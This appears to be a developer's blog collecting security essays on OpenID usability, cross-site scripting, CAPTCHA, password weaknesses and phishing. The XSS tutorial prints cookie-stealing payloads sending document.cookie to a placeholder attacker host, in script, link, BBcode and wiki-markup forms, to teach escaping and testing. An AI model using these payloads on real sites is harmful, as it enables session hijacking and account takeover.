My problems with OpenID

I’ve been tempted to write about why OpenID has been driving me up the wall.

I have not implemented OpenID in any application, so I come at it not as an implementor or programmer but as an end user: a number of sites I’ve used, including Stack Overflow and Sourceforge, have either allowed or insisted upon OpenID authentication.

My first OpenID account was at Verisign Labs (PIP). They’re well established in web security, so I figured it would be a reliable service, and a company that wasn’t likely to disappear on me. Their service, however, left me frustrated for a few reasons.

  • For some reason (early onset dementia?), I could never remember my OpenID URL and found myself needing to look it up all the time, which meant starting up my email client. Because it’s not only a username I chose, but also includes the web address of the OpenID provider, I found it easier to forget. I can’t really see ordinary web users finding the URL thing intuitive; for some time now, favourites/bookmarks and search engines have been teaching us that remembering URLs shouldn’t be necessary.
  • The Verisign Labs PIP has one of the most user-unfriendly features I have ever experienced. With the aim of preventing phishing attacks – a well-meaning goal – it does not allow you to authenticate yourself at any OpenID-supporting site at all unless you have already logged in directly at Verisign’s website during the same browser session. Try typing your OpenID into your favourite site, and you get a message from Verisign telling you that no, you haven’t logged in to Verisign this session, so you can’t proceed. When I encounter this, I have no choice but to open up a second tab and head over to their site to log in, except that much of the time I can’t, because I don’t have a browser certificate installed on the computer I’m using at the time (I don’t think it’s abnormal to use more than one computer regularly). So in order to authenticate me, it has to send me an email containing a single-use PIN. Thank goodness my email account doesn’t use OpenID authentication and I can get to that fairly easily. I’ve never had to jump through so many hoops just to log in to an application I already have an account at.
  • Once I’ve started using an OpenID identity from a certain provider on a site or two, it would appear that I am tied to that OpenID provider for life. It makes it very hard to evaluate OpenID providers when your choice is a permanent one. Yes, I realise that it is possible to use delegation, or even to install your own OpenID server, but if we’re going to be talking about end users, neither of these is really practical, and both are likely to result in decreased security.

My second OpenID provider, MyOpenID, appears to be a fair bit easier to get along with, and doesn’t suffer from many of the problems I’d previously encountered.

Simply by opening another OpenID account, however, everything has become exponentially more complicated: if you switch providers, there’s no easy way that I can see to merge all site accounts based on an identity at my previous provider across to the new one. It seems like changing providers may mean ditching a bunch of old accounts and signing up for all new ones. I was impressed at the way Stack Overflow’s implementation allowed switching the OpenID identity associated with my account there. Unfortunately, this flexibility is a result only of Stack Overflow’s thoughtful design, and such a feature is not part of a typical OpenID implementation.

MyOpenID, thankfully, allows me to authenticate myself without having to go to the OpenID provider’s site in a separate browser window or fiddle around with a single-use PIN. I suppose this is closer to what the OpenID experience should have been like from the start. Maybe my Verisign Labs PIP account just had too many optional features turned on.

I still find, however, that some things about OpenID underwhelm me:

  • Signing up for a new account at an OpenID-enabled site appears no easier when using OpenID. After authenticating with my OpenID URL and whatever authentication I need to do at the OpenID provider’s end, when I return to the client site I still have to fill out a form, and most of the time I still have to confirm my email address. Some fields have been pre-filled by my OpenID account, but I still need to choose a username that is unique to that application, and likely even fill in a Captcha.
  • Users are well experienced already with simple username/password combinations. They know, for example, that the password should be kept secret, and it’s that secret that provides their security. Even though they might have several username/password combinations at different sites, this doesn’t make things any more complicated, because the same concept is just repeated. With an OpenID account, however, not only do they now have a username and password at their OpenID provider, but they also have this OpenID URL, and maybe even a browser certificate. That is three or four pieces of information. Furthermore, how will they understand that authenticating with an OpenID URL alone can provide any security, when the OpenID URL is not a secret, and there is no password? I wouldn’t be surprised if users thought that OpenID was grossly insecure, because they don’t understand that all the real security is hidden from them.
  • I also wouldn’t be surprised if the idea that their identity is passed between sites made users a bit worried. For instance, how can an OpenID implementor reassure the user that even if they use their OpenID URL to log in and register, that doesn’t mean the implementor now has the password to the user’s OpenID account? All the beneficial security concepts are a black box to the users, who may just assume that the OpenID account is a way for their password and identity to be freely passed around between sites. Far from using it only when high security is needed, we may find that users, unaware of the security benefits to OpenID, only trust OpenID with information they don’t mind losing.

So far I haven’t been convinced that using OpenID is significantly safer – even when comparing it to re-using the same username and password at a whole bunch of different sites, which is itself a dubious security practice. With OpenID, I still have all my eggs in one basket. If an attacker gains access to my OpenID account, he can still impersonate me at all sites where I rely on that identity.

OpenID is a well-meaning idea, and with more experience I am sure I will get the hang of it, but being this confusing and headache-inducing even to a web developer is a clear indication that it has some way to go before it can be considered fit for general use. Get this: the Wikipedia page for OpenID displays a prominent warning reading “This page may be too technical for a general audience”, applied to various sections, including the one titled “Logging in”. If it is too hard to describe how to “log in” without alienating a non-technical audience, that is a sign that the process is not very usable, and anyone thinking that they are implementing OpenID in order to “simplify” things for end users may need to think twice.

While some boast about big companies like Google adopting OpenID, it’s not really all that much to crow about – their support is only as a provider, not as an implementor. I cannot, for example, use an existing OpenID to authenticate myself at Google; I can only use a Google ID to authenticate myself elsewhere. Not allowing OpenID authentication themselves doesn’t contribute to the widespread use of OpenID but further segregates it, which is probably just as much of an injustice to OpenID as its indecipherable Wikipedia page.

Cross-site scripting could make you lose your cookies

The following article was originally written and published in July 2005, and is republished with permission. To secure your web application you should probably also read about CSRF and clickjacking.

Cross-site scripting (XSS) is a form of security exploit that threatens any web application. In the past, its severity has tended to be underestimated. The problems go far beyond annoyances and practical jokes perpetrated by script kiddies. By stealing your cookies, cross-site scripting attacks can allow attackers to gain administrative access to your web application.

How does it come about? The problem arises when a web application (such as a PHP script) displays user-submitted content without filtering and/or escaping it properly. If a user submits a guestbook entry, a blog comment, or even a username and password, that content could contain any character, including characters such as <, > or &, which have a different, and special, meaning when they appear as part of HTML. If the same guestbook entry, blog comment or username field is saved by the web application and later displayed as part of a web page, without any intervening filtering or escaping, then any incidental < characters, which in a plain text field should have no special significance, will be interpreted by browsers as the start of HTML tags. Any user who happens to slip the character sequence <script into such a field may be able to cause Javascript code to run in the browsers of other people who view the page.

This code may either be relatively harmless – for example, creating unwanted popups or spam – or malicious – code that is intended to gain private information in order to break into each user’s account on the system.

Although cross-site scripting often involves the insertion of a <script> tag into a web page, it is possible to do some damage with other code. There are many ways to run Javascript in a browser other than through the use of a <script> tag, as well as many other forms of active content besides Javascript. The XSS cheat sheet is the most thorough list of XSS attack vectors I know of, and shows the various methods of obfuscating or encoding XSS that may be used besides plain <script> tags.

Relatively harmless uses of Cross Site Scripting:

  • Code intended to disrupt the layout or appearance of a web page.
  • Scripts, applets or objects intended as a practical joke, displaying annoying messages or popups.
  • Code intended to launch unwanted popup windows for advertising or shock value.

Some more harmful uses of Cross Site Scripting:

  • Scripts, including Javascript or another form of active content, designed to collect private information from cookies and transmit it to a third party website in order to gain administrator access to the system.
  • Objects or applets intended to exploit a known security vulnerability in a particular browser.

Life cycle of a cross-site scripting exploit

I find that cross-site scripting can be a difficult concept to picture. I’ll lead you through a typical cross-site scripting scenario, to give some examples of what is possible.

Joe has built himself a custom CMS complete with user accounts, sessions and different access levels for different users. To log into his CMS, he enters a username and password into a login form on the site. For the duration of his browser session, a cookie stores his ‘session ID’, which allows him to remain logged in while navigating around the site.

Joe’s website also allows any user to sign up for a new account, and place a ‘message’ onto the website. For example, a message can be placed in a blog comment, or in the user’s profile, or even the user’s username. Unfortunately, Joe forgot to use htmlspecialchars or an equivalent to escape plain text in HTML in some places where he echoes user-submitted content to the browser.

A malicious user, Rick, signs up at Joe’s website and fills out his new profile page. In his user profile, he includes the text:

  <script>alert('This CMS stinks!');</script>
Now, whenever Joe (or anybody else) views Rick’s user profile, he gets an annoying JavaScript popup taunting him.

Rick gets a little craftier and places the following code into a guestbook entry of Joe’s page:

  <script>document.location = 'http://ricks-site.example/?' + document.cookie;</script>
Now, whenever Joe (or anybody else) views the guestbook, he will be redirected to a page on Rick’s site. What’s more, the cookie from Joe’s browser session has been transmitted to Rick’s web server as part of the URL.

Rick now uses the cookie from Joe’s browser session to browse Joe’s CMS using Joe’s account. Rick may even be able to change Joe’s password, give himself administrator access, or start deleting content.

Rick gained administrator access to Joe’s CMS by placing a <script> tag into Joe’s guestbook. What we are dealing with here is session hijacking – stealing the session ID (which is often stored in a cookie) from another user in order to impersonate them on the system. XSS is a way for an attacker to obtain access to sessions on another server.

Rick could have used other methods to achieve the same result. For instance, Rick could have used a JavaScript link to trick Joe into sending the very same information to his server:

  <a href="javascript:document.location='http://ricks-site.example/?'+document.cookie;">A web page about dogs</a>

If Joe clicked that link, as he may do without even thinking, his session ID would be transmitted to Rick’s server.

Furthermore, Rick could have embedded his JavaScript into event handler attributes such as onclick, onmousemove and onsubmit – the latter of which could be used to modify the behaviour of a form on the site.

Rick could also have tried using tools other than JavaScript – such as ActiveX controls or applets.

Patch those holes

Below are some steps which you can take to help prevent cross-site scripting attacks from being used on your PHP application, and to limit the amount of damage that can be done in the event that someone finds a way in anyhow.

Whenever displaying plain text content on your web site, escape the plain text string before doing so. In PHP, a simple way to do this is to use the htmlspecialchars function on the data right before output. This applies to all plain text data, whether user-submitted or not. The idea is that < and & characters need to be escaped whether their use is malicious or not.
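As an illustration – a sketch in Python rather than PHP, since the idea is language-independent: Python’s html.escape plays the role of htmlspecialchars here.

```python
import html

def render_comment(comment: str) -> str:
    # Escape the plain-text comment right before embedding it in HTML.
    # html.escape turns &, <, > (and, by default, quotes) into entities,
    # much as PHP's htmlspecialchars does.
    return "<p>" + html.escape(comment) + "</p>"

print(render_comment("<script>alert('gotcha');</script>"))
# The markup arrives at the browser inert: it displays as text,
# rather than running as a script.
```

The same call should wrap every piece of plain text echoed to the page, whether it came from a user or not.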

You may be displaying unfiltered user-submitted content where you don’t realise it. For example, the following is dangerous.

  exit("Error: {$_GET['username']} is too long. Your username may be no more than 12 characters.");

In this case, the user variable “username” is being sent to the browser without being escaped. A user could construct a URL similar to the following and trick people into clicking it: http://www.example.com/page.php?username=%3Cscript%3Ealert('gotcha')%3B%3C%2Fscript%3E

The JavaScript above is harmless, but could be modified to steal information from cookies and transmit it to a third party. Notice that here, the <script> tag is URL encoded. This will automatically be decoded by the server.
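You can check what the server sees after decoding with a quick sketch in Python:

```python
from urllib.parse import unquote

# The URL-encoded payload from a link like the one above.
encoded = "%3Cscript%3Ealert('gotcha')%3B%3C%2Fscript%3E"
decoded = unquote(encoded)
print(decoded)  # <script>alert('gotcha');</script>
```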

You can also reduce the amount of damage that could be done if an attacker does hijack a user session. When designing your CMS, do not rely entirely on cookies for user authentication. Cookies are an excellent convenience feature for users, so their use is encouraged, but there are some highly important tasks that call for more protection. In addition to the cookie, users should also be asked for their password when they undertake activities such as changing their (or anybody else’s) password or escalating their privilege level. That way, if a session is hijacked using its session ID, the attacker won’t be able to lock the rightful account owner out of the account or retain control over it after they leave. Reducing the damage in the case of an attack, however, should be a secondary priority to preventing an attack in the first place.
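That rule can be sketched like this (a Python sketch with illustrative names; a real application would use a proper password-hashing scheme rather than bare SHA-256):

```python
import hashlib
import hmac

# Hypothetical stored credential for the account owner.
STORED_HASH = hashlib.sha256(b"correct horse").hexdigest()

def change_password(has_valid_session: bool, supplied_password: str) -> bool:
    """A valid session cookie alone is not enough for a sensitive action;
    the current password must be re-entered."""
    if not has_valid_session:
        return False
    supplied_hash = hashlib.sha256(supplied_password.encode()).hexdigest()
    # Constant-time comparison, to avoid leaking information via timing.
    return hmac.compare_digest(supplied_hash, STORED_HASH)

# A hijacked session without the password gets nowhere:
print(change_password(True, "guess"))          # False
print(change_password(True, "correct horse"))  # True
```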

What if you want your users to be allowed to submit HTML?

Escaping plain text for output is easy. All that needs to be done is to replace a small set of special characters with their escaped equivalents in HTML.

However, if a web application allows users to submit actual HTML (say, from a rich text editing control, or even prompting the user to type HTML in manually), then filtering this for safe output on a web page becomes much harder. Filtering HTML cannot be reliably done with a search and replace statement or two, or even a highly complex regular expression. Any filter would need to be able to interpret the HTML in the same way that a browser – any browser – might, and browsers do some strange things.

A common compromise, as seen on many blogs, is to allow only a small subset of HTML. This makes filtering considerably more attainable than otherwise, but by no means simple. A read-through of the XSS cheat sheet will reveal the necessary complexity of any filtering mechanism. What’s more, new methods of defeating XSS filters are discovered all the time (and may be added to the XSS cheat sheet at a later date).
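To see why naive filtering fails, consider a deliberately simplistic filter (a Python sketch, not a recommendation) and a payload of the kind catalogued on the cheat sheet that walks straight past it:

```python
import re

def naive_filter(html_input: str) -> str:
    # Strips <script> tags only -- a common but inadequate approach.
    return re.sub(r"</?script[^>]*>", "", html_input, flags=re.IGNORECASE)

# There is no <script> tag anywhere here, so the filter leaves the payload
# untouched -- yet the onerror handler still runs JavaScript in the browser
# when the broken image fails to load.
payload = '<img src="missing" onerror="alert(\'gotcha\')">'
print(naive_filter(payload))
```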

I myself have written a rather comprehensive HTML and XHTML filter in PHP, and it consists of 3 files of source code with over 2000 lines of code in total, not including DTDs. It is capable of understanding the entire HTML language in terms of its DTD. To say it is complicated is an understatement, and it still has its limitations. If you wanted to go down that path, you could, I presume, use HTML Tidy in combination with your own filtering code to make the filtering part a bit easier.

Testing for cross-site scripting vulnerabilities in your application

A way to test for Cross Site Scripting vulnerabilities is to insert testing code into every field, and every variable passed on the query string, that you can find in your application.

The XSS cheat sheet that I mentioned above is the best source of XSS testing code that I know of.

Try, for example, inserting the following code where you would like to test.

  <script>alert('Gotcha!');</script>
Then, visit your blog to see what the comment looks like. If you see the code as you submitted it, your application handled it correctly. If your comment is blank, and you see a JavaScript popup, your application is vulnerable.

It’s important to not just test the obvious places where users can submit content. Think outside the square. For example, you display usernames all over the place – could a user possibly embed HTML or JavaScript into a username? What about user signatures? Secret questions and answers?

Cross Site Scripting can even be a problem in situations where HTML is filtered out of user-submitted content but another markup language is used.

Forum code or “BBcode”:

  [url=javascript:document.location='http://ricks-site.example/?'+document.cookie]A web page about dogs[/url]
Wiki markup:

  [javascript:document.location='http://ricks-site.example/?'+document.cookie A web page about dogs]
Is your forum or wiki vulnerable?

The above two exploits (for bulletin boards and Wikis) require an unsuspecting user to actually click the link in order for the script to be executed. Interestingly, when I first wrote this article, I was surprised to find that a wiki I used at work was vulnerable to this. If anybody is tricked into clicking a link, any JavaScript in that link will run.

More information about cross-site scripting is available in this CERT Advisory and this document from Apache. The Apache document points out, rightly, that the name “Cross-site scripting” is a misleading term, since the attacks need not involve scripting, and they need not even be across sites. Previously at SitePoint, Harry talked about Handling Content From Strangers, which gives some more information on how you can protect your application from exploits.

Have a look at this very thorough article by Chris Shiflett on preventing cross-site scripting attacks.

Cross-site scripting is only one possible form of remote attack on a web application. It is probably one of the most common vulnerabilities in web applications. However, other common vulnerabilities such as CSRF, including Login CSRF (PDF), and clickjacking, are just as serious.

Why CAPTCHA are not a security measure

CAPTCHA, those little groups of distorted letters or numbers we are being asked to recognise and type into forms, are becoming more and more common on the web, and at the same time, frustratingly, more and more difficult to read, like visual word puzzles. The general idea behind them is that by filling them in, you are proving that you are a human being, given that the task would be difficult for a computer program to carry out. CAPTCHA aim to reduce the problem of spam, such as comment spam on blogs or forums, by limiting the rate at which one can send messages or sign up for new accounts enough so that it becomes undesirable for spammers.


There is a problem, however, when these are talked about as a ‘security measure’. They are not a security measure, and this misconception is based on a flawed understanding of security: that humans can be trusted whereas computers – bots – cannot. CAPTCHA are not a bouncer; they cannot deny entry to any human that looks like they are going to start trouble. They can only let in all humans. If your security strategy is something along the lines of ‘If it’s a human, we can trust them’, then you are going to have problems.

Another problem with CAPTCHA is that they are relatively easy to exploit – by which I mean it is easy to pass a large number of tests in order to spam more efficiently. While a single human can only look at a certain number of images per hour, a number of humans with a lot of time on their hands can look at thousands of them per hour. If the internet has taught us anything, it’s that there are a lot of humans on the internet with a lot of time on their hands. So, while a CAPTCHA will slow one human down, it won’t slow hundreds of humans down.

The so-called ‘free porn exploit’, a form of relay attack, takes advantage of this. CAPTCHA images are scraped from a site and shown on the attacker’s site. On the attacker’s site is a form instructing its visitors to identify the letters in the image, often by promising access to something such as free porn. All the attacking computer needs to do is drive a whole bunch of people to that form and then use all the resulting solutions to carry out the intended dirty work at the original site.

It doesn’t have to be porn, of course – that is just a popular way of illustrating this form of circumvention. Any time a human wants something, or even is a little bit bored, you can ask them to fill out a form. Get free jokes in your inbox, fill out this form. If you get many humans working against a CAPTCHA it makes the CAPTCHA ineffective.

Technology for solving CAPTCHA automatically, without requiring any human intervention at all, is also evolving at a high rate. Scripts that can solve known CAPTCHA variants are becoming available all the time, and in response, new CAPTCHA variants are emerging too, each one more difficult to read than the last. The computer power required to recognise characters visually is trivial compared to, for example, the computer power required to crack a good password from its hash, or to break an encryption scheme based on encrypted data. The CAPTCHA that are unbreakable today are only unbreakable by obscurity; they are constructed differently enough from previous ones that current computer programs don’t recognise the letters and numbers in them.

What are alternatives to CAPTCHA?

The alternative will vary depending on what you are using CAPTCHA for. If you are using them to reduce spam on your blog, they will probably continue to do that job, though you may find yourself resorting to other options. Bayesian or rule-based filtering, or a combination of both, are effective methods of reducing spam, and have the added benefit that they do not annoy the user or impede usability or accessibility the way CAPTCHA do.

If you are using CAPTCHA as a security measure, you would need to ensure that you are only doing so based on a proper understanding of what kind of security they bring. Certainly, they cannot do anything about keeping unauthorised or unwanted people out, as this is not what they are designed for. They also have severe limitations in their ability to reduce spamming or flooding, due to them being relatively easy for a sufficiently organised attacker to bypass.

An earlier version of this article was published in November 2005.

The password problem

The first problem with passwords on the web is that passwords alone are not strong authentication. The second problem is that people have too many of them to remember.

Some people will reuse the same password on several different services, leaving all those services vulnerable if their password is compromised through any one of them. Other people use different passwords for several different services, but need to resort to writing passwords down or making heavy use of ‘forgotten password’ features because they are too hard to remember.

Online authentication

In the offline world, pretty good authentication can be achieved by combining a card with a PIN. This is an implementation of two-factor authentication. In short, this means that authentication is based not just on something a person has in their possession (like a key or card), something a person knows (like a PIN or password) or their own body (like a fingerprint or DNA), but on at least two of those three categories. The principle behind this is that it is significantly more difficult for an attacker to steal your identity if they need to both obtain something you have, and find out something you know. When your bank card is stolen, the thief cannot access your account unless they also know your PIN. If your PIN is guessed, overheard or intercepted somehow, the snoop cannot access your account without your card.

Online, however, strong authentication is a lot more difficult, because authentication has to rely almost entirely on something you know. This means that rather than just being one factor in authenticating you, your user name and password combination becomes the only factor. It becomes a lot easier for someone to steal your identity, as they only need to intercept your password somehow.

When we sign up for online accounts, we are told to create passwords that are “strong” and unique. The general idea of “strong” here is hard to guess, but it also helps with “hard for someone to see over your shoulder”. However, a strong password still does not protect against a situation where someone bugs your computer, or your ISP’s computer, and sees your password as it is transmitted. This is relatively easy to do – as easy as exploiting a bug in any software in your system or your ISP’s, or an ISP betraying your trust.

In making passwords stronger, too, they are also made harder to remember. This is a good thing up to a point: it means that someone who does glimpse you typing your password is less likely to recall it or catch all the letters. But beyond that point, being harder to remember actually detracts from security, because users are more likely to write passwords down in order to remember them. When the password is the only secret thing that can authenticate a person for an online account, having that password written down makes a less than ideal situation worse. It means that the password now becomes vulnerable not only to eavesdropping, but also to physical theft. Comparing this to two-factor authentication, we have gone in the opposite direction. Not only is there only a single factor, but there are two types of vulnerabilities for this single factor, and an attacker can choose either.

Multiple accounts

The number of accounts we need to authenticate ourselves (prove our identity) for is growing. It is not uncommon for someone to have a dozen different accounts or more for different online services, ranging in importance from online bank accounts and auction websites right down to simple blogs and discussion forums.

If we are to assume that people use different passwords for each, we are expecting too much for them all to be remembered. It is common practice for people to just write them all down, but as stated that detracts from security.

The alternative for users is to re-use the same password for multiple accounts, but this is putting all their eggs in one basket. If their one good password is compromised, then all these accounts are vulnerable. If your password is stolen or intercepted, it may not even be your fault – a company hosting one of your accounts may have let it slip through negligence.

A reasonable person probably uses a combination of the above – using unique passwords on only those very important accounts such as their online banking, while re-using a common good password for everything else.

Technological solutions

OpenID is a distributed authentication mechanism which aims to let someone log in to accounts with several different companies, without exposing their password to those companies. The password is sent only to the single OpenID provider, which authenticates the person and then signals to the company that the person has been authenticated according to that OpenID account.

This helps cut down the number of ways that a password could be intercepted. However, it does not change the fact that if that one single password does get compromised, the attacker can gain (albeit temporary) access to all those accounts. In fact, it could make it worse: upon gaining entry to your OpenID account, the attacker might be presented with a nice little list of all approved sites – i.e. a list of everywhere they can use this OpenID account. This would depend on the OpenID provider.

Educating users

Educating users is something that does not work as well in practice as it does in intention. Most users already know that they should not write down their passwords, and that passwords should be as strong and unique as possible. However, they will continue to behave in the way that is most convenient to them: creating easier-to-remember passwords, re-using them, or writing them down, just to make it easier to deal with so many.

Telling people not to get phished

If you provide users with a password, you should probably think about telling them how to keep their password safe. Teaching users how to avoid being tricked into giving away their account data – being ‘phished’ – can be difficult.

Social engineering is a method of obtaining access to a secured system by exploiting a person’s trust. It consists of deceiving a person into granting access to a system by some sort of pretense. For example, let’s say I receive a rather desperate sounding phone call from an intern over in IT who has screwed up, lost their password, and needs desperately to fix some problem for their boss. They know I have an account and are hoping I would be so kind as to log in for them, something I might be happy to do for a colleague. However, the person on the phone is not an intern in IT at all, and doesn’t even work for the company. What’s more, the second I have given them access via my own username and password, all of the security precautions are now absolutely useless; the attacker has gained access to the system they wanted to access. What if they pretended to be working at the bank? They might goad me into letting them empty my bank account.

A second example of a social engineering attack is to exploit a person’s guilt – to make the person believe that they have been caught doing something wrong and may get in a lot of trouble if they do not cooperate. This ‘cooperation’ may involve handing over their personal details. This kind of attack can even work if the victim did not do anything wrong; the act of being ‘accused’ can put someone into a defensive state. The desire to cover up any wrongdoing they have been accused of may distract them from the fact they are being conned.

The term phishing is used to describe such attacks when they are done over a message service, such as over email or text messages. Phishing is also often done on a large scale; a would-be attacker sends an email to perhaps thousands of people pretending to be from the IT department, or a bank, or something, hoping that at least one person will fall for the scheme. Some such schemes are wildly inventive, while there are just as many that are stock standard: ‘we need to confirm your account details’, or ‘we need to verify that your account is active’.

From the point of view of anybody involved in computer security, the fact that such attacks are so effective is depressing. They are effective for many reasons.

One reason such attacks are effective is that, as with any security precaution, a system is only as strong as its weakest point. In a large organisation in which lots of people have access to a system, only one person needs to slip up and accidentally give their username and password to the wrong person in order for the system to be compromised.

Another reason is that the users of a system may, being less confident with technology, be naturally inclined to trust and be a little fearful of somebody who both seems to know a lot more about technology and is in a position of authority; for example, someone from an IT department, or law enforcement, or who has access to their bank account. The consideration as to whether or not the person who contacted them is legitimate takes second place to the desire to comply with this person who seems so much more knowledgeable about the system.

It may also be that people don’t realise that computer security does not stop at some unseen attacker trying to guess or steal your password; that in large part an attacker can just walk right up to you and ask for it.

So, what do we tell the users?

Systems administrators often use the phrase ‘we will never ask for your password’. This is a good message, because it at least signals to users that there may be nefarious motivations behind someone official-sounding asking them to confirm their password.

However, in most cases where someone is duped into giving their account information, they actually believe the person who has contacted them is legitimate. The phrase ‘we will never ask for your password’ can quickly develop exceptions to the rule; an attacker might say ‘Oh, but our systems are down and we have to log people in manually today.’ As it is coming from a person genuinely believed to be legitimate, such an exception is easily accepted to be true both because it is plausible, and because the victim trusts the attacker to know more about the issue than they do.

I think that users should be instructed that if they are ever asked for their password, even by genuine system administrators, they should not give it over the phone or in reply to the email. Instead, the receiver should call back the company on the known correct phone number and then give the password. Let’s say that I call you up and tell you that we are in the process of deleting unused accounts and we need your password to confirm whether your account is used or not. If you truly believe that my story is legitimate, you may ignore the advice that we never ask you for your password, because my story seems like a plausible reason for an exception to the rule. But if you have been told that you should always call me back when asked for a password, you may be less likely to be convinced by my insistence that that isn’t necessary. I might say that you won’t be able to call me back if you tried, or that the matter is urgent, but this may raise more red flags.

In terms of email phishing, too, we can instruct users never to click through a link to a site on which they have an account; instead, should they wish to visit the site they should type the site address or name into their browser.

Whether this is all effective is speculation, and it must still be remembered that no matter how security conscious an organisation is as a whole, it only takes one weak link: one uninformed or absent-minded person to slip up and allow a breach of security.